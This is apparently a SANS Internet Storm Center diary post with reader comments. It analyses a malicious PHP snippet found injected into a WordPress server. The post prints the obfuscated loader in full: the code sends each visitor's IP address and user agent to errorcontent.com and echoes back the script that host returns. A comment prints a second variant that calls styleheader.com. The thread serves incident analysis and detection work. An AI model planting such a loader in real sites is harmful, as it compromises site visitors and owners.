Possible Wordpress Botnet C&C: errorcontent.com

Possible Wordpress Botnet C&C: errorcontent.com
Thanks to one of our readers, for sending us this snipped of PHP he found on a Wordpress server (I added some line breaks and comments in red for readability): `#2b8008# <-- no idea what this hex value does. I modified it in case it identifies the user submitting this to us. error_reporting(0); /* turn off error reporting / @ini_set('display_errors',0); / do not display errors to the user / $wp_mezd8610 = @$_SERVER['HTTP_USER_AGENT']; / retrieve the user agent string /` `/ only run the code if this is Chrome or IE and not a "bot" */` `if (( preg_match ('/Gecko\|MSIE/i', $wp_mezd8610) && !preg_match ('/bot/i', $wp_mezd8610))) {` `# Assemble a URL like http://errorcontent.com/content?ip=[client ip]&referer=[server host name]&ua=[user agent]` `$wp_mezd098610="http://"."error"."content".".com/"."content"."/? ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_mezd8610);` `# check if we have the curl extension installed` `if (function_exists('curl_init') && function_exists('curl_exec')) {` `$ch= curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_mezd098610); curl_setopt ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);` `$wp_8610mezd = curl_exec ($ch); curl_close($ch);}` `# if we don't have curl, try file_get_contents which requires allow_url_fopen. elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_8610mezd = @file_get_contents($wp_mezd098610);}` # or try fopen as a last resort `elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_8610mezd=@stream_get_contents(@fopen($wp_mezd098610, "r"));}}` `if (substr($wp_8610mezd,1,3) === 'scr'){ echo $wp_8610mezd; }` # The data retrieved will be echoed back to the user if it starts with the string "scr". I haven't been able to retrieve any content from errorcontent.com. Has anybody else seen this code, or is able to retrieve content from errorcontent.com ? According to whois, errorcontent.com is owned by a Chinese organization. It currently resolves to 37.1.207.26, which is owned by a british ISP. Any help as to the nature of this snippet will be appreciated. --- Johannes B. Ullrich, Ph.D. STI\|Twitter\|LinkedIn I will be teaching next: Defending Web Applications Security Essentials - SANS Cloud Security Europe 2020	Johannes 3882 Posts ISC Handler May 26th 2015
Subscribe	May 26th 2015 5 years ago
I found this very old pastie which also refers to errorcontent.com (Jan 2014): pastebin.com/… Seems to be the same code... /x	Xme 533 Posts ISC Handler
Quote	May 26th 2015 5 years ago
The 6-character code is an identified of the variation of the malware. Here's another example. Same format, different host, 6-code, and variable name. Points back at the same IP though. $ host styleheader.com styleheader.com has address 37.1.207.26 styleheader.com mail is handled by 10 mail.styleheader.com. #19f955# error_reporting(0); ini_set('display_errors',0); $wp_uzlk8990 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko\|MSIE/i', $wp_uzlk8990) && !preg_match ('/bot/i', $wp_uzlk8990))){ $wp_uzlk098990="http://"."style"."header".".com/header"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlenc ode($wp_uzlk8990); $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_uzlk098990); curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_8990uzlk = curl_exec ($ch); curl_close($ch);} ...	Maarten 1 Posts
Quote	May 27th 2015 5 years ago
Added detection to phish.ndb: Sanesecurity.Malware.25170.PhpBot Sanesecurity.Malware.25175.PhpBot Cheers for the samples, Steve Sanesecurity.com	Sanesecurity 21 Posts
Quote	May 27th 2015 5 years ago

Thanks to one of our readers, for sending us this snipped of PHP he found on a Wordpress server (I added some line breaks and comments in red for readability):

#2b8008# <-- no idea what this hex value does. I modified it in case it identifies the user submitting this to us. error_reporting(0); /* turn off error reporting */ @ini_set('display_errors',0); /* do not display errors to the user */ $wp_mezd8610 = @$_SERVER['HTTP_USER_AGENT']; /* retrieve the user agent string */

/* only run the code if this is Chrome or IE and not a "bot" */

if (( preg_match ('/Gecko|MSIE/i', $wp_mezd8610) && !preg_match ('/bot/i', $wp_mezd8610))) {

# Assemble a URL like http://errorcontent.com/content?ip=[client ip]&referer=[server host name]&ua=[user agent]

$wp_mezd098610="http://"."error"."content".".com/"."content"."/? ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_mezd8610);

# check if we have the curl extension installed

if (function_exists('curl_init') && function_exists('curl_exec')) {

$ch= curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_mezd098610); curl_setopt ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$wp_8610mezd = curl_exec ($ch); curl_close($ch);}

# if we don't have curl, try file_get_contents which requires allow_url_fopen. elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_8610mezd = @file_get_contents($wp_mezd098610);}

# or try fopen as a last resort
elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_8610mezd=@stream_get_contents(@fopen($wp_mezd098610, "r"));}}

if (substr($wp_8610mezd,1,3) === 'scr'){ echo $wp_8610mezd; }

# The data retrieved will be echoed back to the user if it starts with the string "scr".

I haven't been able to retrieve any content from errorcontent.com. Has anybody else seen this code, or is able to retrieve content from errorcontent.com ?

According to whois, errorcontent.com is owned by a Chinese organization. It currently resolves to 37.1.207.26, which is owned by a british ISP. Any help as to the nature of this snippet will be appreciated.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

I will be teaching next: Defending Web Applications Security Essentials - SANS Cloud Security Europe 2020

Johannes

3882 Posts
ISC Handler

May 26th 2015

I found this very old pastie which also refers to errorcontent.com (Jan 2014):
pastebin.com/…
Seems to be the same code...

/x

Xme

533 Posts
ISC Handler

The 6-character code is an identified of the variation of the malware. Here's another example. Same format, different host, 6-code, and variable name. Points back at the same IP though.

$ host styleheader.com
styleheader.com has address 37.1.207.26
styleheader.com mail is handled by 10 mail.styleheader.com.

#19f955#
error_reporting(0); ini_set('display_errors',0); $wp_uzlk8990 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_uzlk8990) && !preg_match ('/bot/i', $wp_uzlk8990))){
$wp_uzlk098990="http://"."style"."header".".com/header"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlenc
ode($wp_uzlk8990);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_uzlk098990);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_8990uzlk = curl_exec ($ch); curl_close($ch);}
...

Maarten

1 Posts

Added detection to phish.ndb:

Sanesecurity.Malware.25170.PhpBot
Sanesecurity.Malware.25175.PhpBot

Cheers for the samples,

Steve
Sanesecurity.com

Sanesecurity

21 Posts